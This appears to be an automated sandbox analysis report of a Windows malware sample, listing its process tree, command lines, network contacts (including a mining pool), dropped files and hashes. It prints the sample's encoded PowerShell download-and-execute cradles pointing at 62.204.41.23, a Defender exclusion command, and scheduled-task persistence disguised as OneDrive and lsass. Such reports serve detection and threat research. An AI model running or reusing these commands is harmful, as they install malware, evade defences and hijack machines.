PID 3476 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4904 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 03:46 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2A47.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 43.242.202.142.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp

Files

memory/4408-133-0x00000000005E0000-0x00000000005F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_md0wiidr.m4m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1912-150-0x0000027960920000-0x0000027960942000-memory.dmp

memory/260-172-0x000001DF3A340000-0x000001DF3A350000-memory.dmp

memory/260-173-0x000001DF3A340000-0x000001DF3A350000-memory.dmp

memory/1912-174-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/1912-175-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/2668-176-0x000001E0D2D20000-0x000001E0D2D30000-memory.dmp

memory/2400-177-0x0000015970360000-0x0000015970370000-memory.dmp

memory/260-178-0x000001DF3A340000-0x000001DF3A350000-memory.dmp

memory/2400-179-0x0000015970360000-0x0000015970370000-memory.dmp

memory/1912-180-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/2668-183-0x000001E0D2D20000-0x000001E0D2D30000-memory.dmp

memory/1912-194-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/1912-195-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/2668-197-0x000001E0D2D20000-0x000001E0D2D30000-memory.dmp

memory/2668-196-0x000001E0D2D20000-0x000001E0D2D30000-memory.dmp

memory/2400-198-0x0000015970360000-0x0000015970370000-memory.dmp

memory/1912-200-0x0000027946AD0000-0x0000027946AE0000-memory.dmp

memory/2400-199-0x0000015970360000-0x0000015970370000-memory.dmp

memory/4812-202-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2668-205-0x000001E0D2D20000-0x000001E0D2D30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 321756505d3ef828b22186c6b927a5fa
SHA1 d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256 990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA512 50fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4812-207-0x0000000005590000-0x00000000055F6000-memory.dmp

memory/4812-208-0x00000000056A0000-0x000000000573C000-memory.dmp

memory/4812-209-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/4812-211-0x0000000005C80000-0x0000000005C90000-memory.dmp

memory/1776-212-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

memory/1776-215-0x000000000AAA0000-0x000000000B0B8000-memory.dmp

memory/1776-216-0x000000000A600000-0x000000000A70A000-memory.dmp

memory/1776-217-0x000000000A530000-0x000000000A542000-memory.dmp

memory/1776-219-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/4812-222-0x0000000005C80000-0x0000000005C90000-memory.dmp

memory/1776-223-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/1776-224-0x000000000A810000-0x000000000A84C000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

memory/1396-239-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

memory/1396-241-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

memory/1396-240-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4684-252-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1396-253-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4324-257-0x00007FF6A6840000-0x00007FF6A720A000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3656-269-0x0000000000880000-0x0000000000CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5b92b3663e1cc4a44519b264db471a86
SHA1 b95484c65feac2815b5faf92cce71095616cad4c
SHA256 0658ce65a6ce885d5344ccf7bfade5a054e814eec5299820dfc65164c1aed79c
SHA512 5f5ce39a3c7059b8286c3370be2696896100fb18e99efd7394c8f52244716796580e724d8fa7533db3459ed4f4cda2c48a0fe7c39d5068497e92f3b8bc74211e

memory/3656-280-0x0000000000880000-0x0000000000CA0000-memory.dmp

memory/3656-281-0x0000000000880000-0x0000000000CA0000-memory.dmp

memory/3656-282-0x0000000006BB0000-0x0000000007154000-memory.dmp

memory/3656-283-0x00000000066A0000-0x0000000006732000-memory.dmp

memory/1716-284-0x0000012B62860000-0x0000012B62870000-memory.dmp

memory/1716-286-0x0000012B62860000-0x0000012B62870000-memory.dmp

memory/1716-285-0x0000012B62860000-0x0000012B62870000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1440-293-0x0000020B947E0000-0x0000020B94800000-memory.dmp

memory/3476-292-0x00007FF7D5CC0000-0x00007FF7D668A000-memory.dmp

memory/1776-306-0x000000000A9E0000-0x000000000AA56000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3656-309-0x0000000000880000-0x0000000000CA0000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/1908-311-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1908-312-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1908-313-0x0000000000070000-0x0000000000490000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2A47.tmp.bat

MD5 fff3921b13502256086dd07b3ec594c7
SHA1 c172a54063a5240a05e1543e13975da394c2438a
SHA256 39c76c1af74aaae62266444e872bc9a3cebb264754078827707d7e0a807c8b14
SHA512 5403e43a4190b5eee1bef5541a3d51ab51650a89c04453990251af54d268cfbe79d033d8528351b2cb89b9e04470c34320565907ae6f3ff8fff56cc8380ae396

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35146d80e3801d385baf79d8e05c7fdd
SHA1 101d15d4b4f72e311fd46e806204661186315539
SHA256 ea990fbce8d16e01984d24eb8033dd3d7554aa0a1f92162de237d363a598e3fe
SHA512 d25e95ebea1b6d07731f38c694a441d60c725361a89dd325aeeb8440faaa27a330e073159e13d441f093d967f806f61e3ab938fbe4df77913e3ee0a9f01d7998

memory/1440-317-0x0000020B96290000-0x0000020B962D0000-memory.dmp

memory/1776-318-0x000000000C810000-0x000000000C860000-memory.dmp

memory/1908-319-0x00000000062B0000-0x00000000062BA000-memory.dmp

memory/4684-320-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1776-321-0x000000000C030000-0x000000000C1F2000-memory.dmp

memory/1776-322-0x000000000C860000-0x000000000CD8C000-memory.dmp

memory/4720-323-0x00007FF633810000-0x00007FF633839000-memory.dmp

memory/1440-325-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-326-0x0000000000070000-0x0000000000490000-memory.dmp

memory/4720-328-0x00007FF633810000-0x00007FF633839000-memory.dmp

memory/1440-329-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-330-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-333-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-334-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-336-0x0000020B96310000-0x0000020B96330000-memory.dmp

memory/1440-338-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-339-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-341-0x0000020B96310000-0x0000020B96330000-memory.dmp

memory/1440-343-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-344-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-347-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp